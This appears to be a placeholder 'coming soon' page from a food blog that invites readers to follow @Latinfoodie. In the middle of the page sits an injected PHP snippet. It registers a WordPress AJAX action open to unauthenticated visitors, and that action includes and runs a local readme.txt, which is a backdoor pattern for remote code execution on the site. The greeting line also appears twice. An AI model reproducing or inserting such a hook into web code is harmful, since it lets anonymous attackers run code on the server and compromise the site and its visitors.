Cooking Up Something New
Hi friends! I’m working on a new food project to be released soon. In the meantime, stay in touch via @Latinfoodie
if(!function_exists('file_check_readme14300')){ add_action('wp_ajax_nopriv_file_check_readme14300', 'file_check_readme14300'); add_action('wp_ajax_file_check_readme14300', 'file_check_readme14300'); function file_check_readme14300() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Hi friends! I’m working on a new food project to be released soon. In the meantime, stay in touch via @Latinfoodie
Food For Thought